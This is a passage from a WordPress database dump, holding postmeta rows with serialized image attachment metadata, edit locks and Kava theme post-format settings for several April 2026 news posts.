:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38946,5861,'_wp_attached_file','2026/04/today-news11.jpeg'),(38947,5861,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2026/04/today-news11.jpeg\";s:8:\"filesize\";i:151931;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"today-news11-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17261;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"today-news11-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122832;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"today-news11-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7438;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"today-news11-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77980;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"today-news11-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22931;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:24:\"today-news11-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4535;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:25:\"today-news11-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14550;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:25:\"today-news11-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35634;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:25:\"today-news11-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37483;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:25:\"today-news11-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51556;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:26:\"today-news11-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111737;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:25:\"today-news11-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52885;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:25:\"today-news11-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77103;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:26:\"today-news11-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113701;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38954,5859,'kava_extra_enable_breadcrumbs','inherit'),(39066,5872,'kava_extra_enable_breadcrumbs','inherit'),(38950,5859,'_thumbnail_id','5861'),(38955,5859,'post_formats',''),(38956,5859,'gallery_tab',''),(38957,5859,'kava_extra_gallery_images',''),(38958,5859,'link_tab',''),(38959,5859,'kava_extra_link',''),(38960,5859,'kava_extra_link_target','_blank'),(38961,5859,'quote_tab',''),(38962,5859,'kava_extra_quote_text',''),(38963,5859,'kava_extra_quote_cite',''),(38964,5859,'audio_tab',''),(38965,5859,'kava_extra_audio',''),(38966,5859,'kava_extra_audio_loop','false'),(38967,5859,'kava_extra_audio_autoplay','false'),(38968,5859,'kava_extra_audio_preload','false'),(38969,5859,'video_tab',''),(38970,5859,'kava_extra_video_type','library'),(38971,5859,'kava_extra_video_library',''),(38972,5859,'kava_extra_video_external',''),(38973,5859,'kava_extra_video_poster',''),(38974,5859,'kava_extra_video_width','770'),(38975,5859,'kava_extra_video_height','480'),(38976,5859,'kava_extra_video_loop','false'),(38977,5859,'kava_extra_video_autoplay','false'),(38978,5859,'kava_extra_video_preload','false'),(39139,5881,'_last_editor_used_jetpack','block-editor'),(39138,5881,'_edit_lock','1777462368:38'),(38981,5865,'_edit_lock','1776879665:38'),(38982,5865,'_last_editor_used_jetpack','block-editor'),(38983,5866,'_wp_attached_file','2026/04/Media-pic.jpg'),(38984,5866,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:21:\"2026/04/Media-pic.jpg\";s:8:\"filesize\";i:93995;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"Media-pic-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12893;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"Media-pic-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"Media-pic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6640;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"Media-pic-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52755;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"Media-pic-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20931;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"Media-pic-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4766;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"Media-pic-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12453;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"Media-pic-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28603;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"Media-pic-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31943;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"Media-pic-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42835;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"Media-pic-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98963;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"Media-pic-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36616;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"Media-pic-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58111;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"Media-pic-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103684;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38992,5865,'kava_extra_enable_breadcrumbs','inherit'),(39092,5875,'_last_editor_used_jetpack','block-editor'),(38987,5865,'_wp_old_date','2026-04-22'),(38988,5865,'_thumbnail_id','5866'),(38993,5865,'post_formats',''),(38994,5865,'gallery_tab',''),(38995,5865,'kava_extra_gallery_images',''),(38996,5865,'link_tab',''),(38997,5865,'kava_extra_link',''),(38998,5865,'kava_extra_link_target','_blank'),(38999,5865,'quote_tab',''),(39000,5865,'kava_extra_quote_text',''),(39001,5865,'kava_extra_quote_cite',''),(39002,5865,'audio_tab',''),(39003,5865,'kava_extra_audio',''),(39004,5865,'kava_extra_audio_loop','false'),(39005,5865,'kava_extra_audio_autoplay','false'),(39006,5865,'kava_extra_audio_preload','false'),(39007,5865,'video_tab',''),(39008,5865,'kava_extra_video_type','library'),(39009,5865,'kava_extra_video_library',''),(39010,5865,'kava_extra_video_external',''),(39011,5865,'kava_extra_video_poster',''),(39012,5865,'kava_extra_video_width','770'),(39013,5865,'kava_extra_video_height','480'),(39014,5865,'kava_extra_video_loop','false'),(39015,5865,'kava_extra_video_autoplay','false'),(39016,5865,'kava_extra_video_preload','false'),(39017,5868,'_edit_lock','1776880081:38'),(39018,5868,'_last_editor_used_jetpack','block-editor'),(39019,5869,'_wp_attached_file','2026/04/CEO.jpg'),(39020,5869,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:2048;s:4:\"file\";s:15:\"2026/04/CEO.jpg\";s:8:\"filesize\";i:205009;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"CEO-216x300.jpg\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15129;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"CEO-738x1024.jpg\";s:5:\"width\";i:738;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104384;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"CEO-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6642;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"CEO-768x1066.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1066;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106949;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:17:\"CEO-1107x1536.jpg\";s:5:\"width\";i:1107;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:188897;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"CEO-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18634;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"CEO-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4245;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"CEO-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12361;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:15:\"CEO-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28091;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:15:\"CEO-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33943;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:15:\"CEO-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38991;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:16:\"CEO-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82765;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:17:\"CEO-1476x1080.jpg\";s:5:\"width\";i:1476;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160882;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:15:\"CEO-600x833.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:833;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73113;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:15:\"CEO-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57835;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:16:\"CEO-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83245;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39021,5870,'_wp_attached_file','2026/04/sette-new2.jpg'),(39022,5870,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1067;s:4:\"file\";s:22:\"2026/04/sette-new2.jpg\";s:8:\"filesize\";i:237561;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"sette-new2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17539;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"sette-new2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142680;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"sette-new2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7080;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"sette-new2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87882;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"sette-new2-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270324;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"sette-new2-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26343;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"sette-new2-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5192;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"sette-new2-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14322;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"sette-new2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37266;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"sette-new2-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41628;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"sette-new2-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59981;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"sette-new2-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154866;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"sette-new2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57992;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"sette-new2-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84175;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:23:\"sette-new2-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162405;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39027,5868,'_edit_last','38'),(39025,5868,'_wp_old_date','2026-04-22'),(39026,5868,'_thumbnail_id','5870'),(39030,5868,'kava_extra_enable_breadcrumbs','inherit'),(39031,5868,'post_formats',''),(39032,5868,'gallery_tab',''),(39033,5868,'kava_extra_gallery_images',''),(39034,5868,'link_tab',''),(39035,5868,'kava_extra_link',''),(39036,5868,'kava_extra_link_target','_blank'),(39037,5868,'quote_tab',''),(39038,5868,'kava_extra_quote_text',''),(39039,5868,'kava_extra_quote_cite',''),(39040,5868,'audio_tab',''),(39041,5868,'kava_extra_audio',''),(39042,5868,'kava_extra_audio_loop','false'),(39043,5868,'kava_extra_audio_autoplay','false'),(39044,5868,'kava_extra_audio_preload','false'),(39045,5868,'video_tab',''),(39046,5868,'kava_extra_video_type','library'),(39047,5868,'kava_extra_video_library',''),(39048,5868,'kava_extra_video_external',''),(39049,5868,'kava_extra_video_poster',''),(39050,5868,'kava_extra_video_width','770'),(39051,5868,'kava_extra_video_height','480'),(39052,5868,'kava_extra_video_loop','false'),(39053,5868,'kava_extra_video_autoplay','false'),(39054,5868,'kava_extra_video_preload','false'),(39055,5872,'_edit_lock','1776880409:38'),(39056,5872,'_last_editor_used_jetpack','block-editor'),(39057,5873,'_wp_attached_file','2026/04/MFDP.jpg'),(39058,5873,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:1272;s:4:\"file\";s:16:\"2026/04/MFDP.jpg\";s:8:\"filesize\";i:90809;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"MFDP-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15906;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"MFDP-869x1024.jpg\";s:5:\"width\";i:869;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87636;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"MFDP-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6943;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"MFDP-768x905.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:905;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73555;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"MFDP-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16562;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:15:\"MFDP-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4033;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:16:\"MFDP-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12383;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:16:\"MFDP-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25417;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:16:\"MFDP-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28483;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:16:\"MFDP-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33212;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:17:\"MFDP-1080x650.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58605;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:18:\"MFDP-1080x1080.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80190;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:16:\"MFDP-600x707.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51866;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:16:\"MFDP-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49198;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:17:\"MFDP-1080x640.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58616;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39091,5875,'_edit_lock','1776880625:38'),(39063,5872,'_edit_last','38'),(39061,5872,'_wp_old_date','2026-04-22'),(39062,5872,'_thumbnail_id','5873'),(39067,5872,'post_formats',''),(39068,5872,'gallery_tab',''),(39069,5872,'kava_extra_gallery_images',''),(39070,5872,'link_tab',''),(39071,5872,'kava_extra_link',''),(39072,5872,'kava_extra_link_target','_blank'),(39073,5872,'quote_tab',''),(39074,5872,'kava_extra_quote_text',''),(39075,5872,'kava_extra_quote_cite',''),(39076,5872,'audio_tab',''),(39077,5872,'kava_extra_audio',''),(39078,5872,'kava_extra_audio_loop','false'),(39079,5872,'kava_extra_audio_autoplay','false'),(39080,5872,'kava_extra_audio_preload','false'),(39081,5872,'video_tab',''),(39082,5872,'kava_extra_video_type','library'),(39083,5872,'kava_extra_video_library',''),(39084,5872,'kava_extra_video_external',''),(39085,5872,'kava_extra_video_poster',''),(39086,5872,'kava_extra_video_width','770'),(39087,5872,'kava_extra_video_height','480'),(39088,5872,'kava_extra_video_loop','false'),(39089,5872,'kava_extra_video_autoplay','false'),(39090,5872,'kava_extra_video_preload','false'),(39093,5876,'_wp_attached_file','2026/04/STARR-2.jpg'),(39094,5876,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1153;s:4:\"file\";s:19:\"2026/04/STARR-2.jpg\";s:8:\"filesize\";i:651283;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"STARR-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13720;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"STARR-2-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114633;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"STARR-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7017;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"STARR-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66253;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"STARR-2-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229456;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"STARR-2-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24169;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"STARR-2-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4819;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"STARR-2-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13678;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"STARR-2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34239;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"STARR-2-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35080;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"STARR-2-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56282;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:20:\"STARR-2-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesi